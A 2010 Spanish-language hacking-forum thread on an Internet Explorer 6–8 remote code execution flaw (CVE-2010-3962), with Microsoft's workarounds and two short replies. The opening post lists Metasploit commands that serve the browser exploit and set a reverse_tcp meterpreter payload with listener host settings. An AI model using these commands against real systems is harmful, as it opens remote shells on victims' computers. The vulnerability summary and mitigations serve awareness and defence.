Foro de elhacker.net

Seguridad Informática => Bugs y Exploits => Mensaje iniciado por: Shell Root en 24 Diciembre 2010, 17:31 pm



Título: [0 Day] RCE en Internet Explorer 6, 7 y 8
Publicado por: Shell Root en 24 Diciembre 2010, 17:31 pm
[0 Day] RCE en Internet Explorer 6, 7 y 8
(http://www.jungus.com/b/wp-content/plugins/wp-o-matic//f7fcc_ie-bug.jpg)


INFORMACIÓN
Microsoft publicó un boletín informando de una vulnerabilidad (CVE-2010-3962) que afecta a varias de las versiones soportadas de su navegador Internet Explorer 6, 7 y 8; la cual están investigando y por el momento no tiene un parche de solución.

El principal impacto que puede generar esta vulnerabilidad es la ejecución remota de código (RCE -Remote Code Execution-).

El boletín de Microsoft provee soluciones provisionales para evitar la amenaza, las cuales son:

  • Evitar el estilo CSS del sitio usando estilos CSS definidos por el usuario
  • Utilizar el kit de herramientas EMET
  • Utilizar la protección DEP para IE 7
  • Leer correos en modo texto
  • Fijar las zonas de Intranet e Internet en modo de seguridad “Alto” para bloquear los controles ActiveX y el Active Scripting en esas zonas.

También se informa que el Internet Explorer 9 (Beta) no es afectado y se puede usar sin problemas. En el caso de Internet Explorer 8 en su instalación con valores por defecto es poco probable que sea afectado ya que ofrece la protección DEP.


(http://daw-labs.com/wp-content/uploads/2010/12/metasploit.png)

El módulo explota una vulnerabilidad de corrupción de memoria en el motor HTML de Microsoft (MSHTML). Al analizar una página HTML que contiene una etiqueta especialmente diseñada en CSS provoca la corrupción de memoria lo que conlleva a la ejecución de código arbitrario.

Exploit
Código
  1. use exploit/windows/browser/ms10_xxx_ie_css_clip

Payload
Código
  1. set PAYLOAD windows/meterpreter/reverse_tcp

Comandos del Metasploit
Código
  1. use exploit/windows/browser/ms10_xxx_ie_css_ clip
  2. set SRVHOST IP
  3. set payload windows/meterpreter/reverse_tcp
  4. set LHOST IP
  5. exploit

Video
Debido a algunos problemas con mis máquinas virtuales, opté por poner un vídeo de un tercero.

xbIxkltlP1I

Visto en: :http://daw-labs.com/rce-en-internet-explorer-6-7-y-8/


Título: Re: [0 Day] RCE en Internet Explorer 6, 7 y 8
Publicado por: EvilGoblin en 28 Diciembre 2010, 16:21 pm
corrupcion de memoria? lo que significa que debe estar abierta la pagina unos 2 minutos hasta cargar el exploit ¿?¿


Título: Re: [0 Day] RCE en Internet Explorer 6, 7 y 8
Publicado por: .:WindHack:. en 28 Diciembre 2010, 17:56 pm
corrupcion de memoria? lo que significa que debe estar abierta la pagina unos 2 minutos hasta cargar el exploit ¿?¿

Exactamente, es algo demorada la ejecución del exploit y en algunos casos no se completa la carga de manera correcta.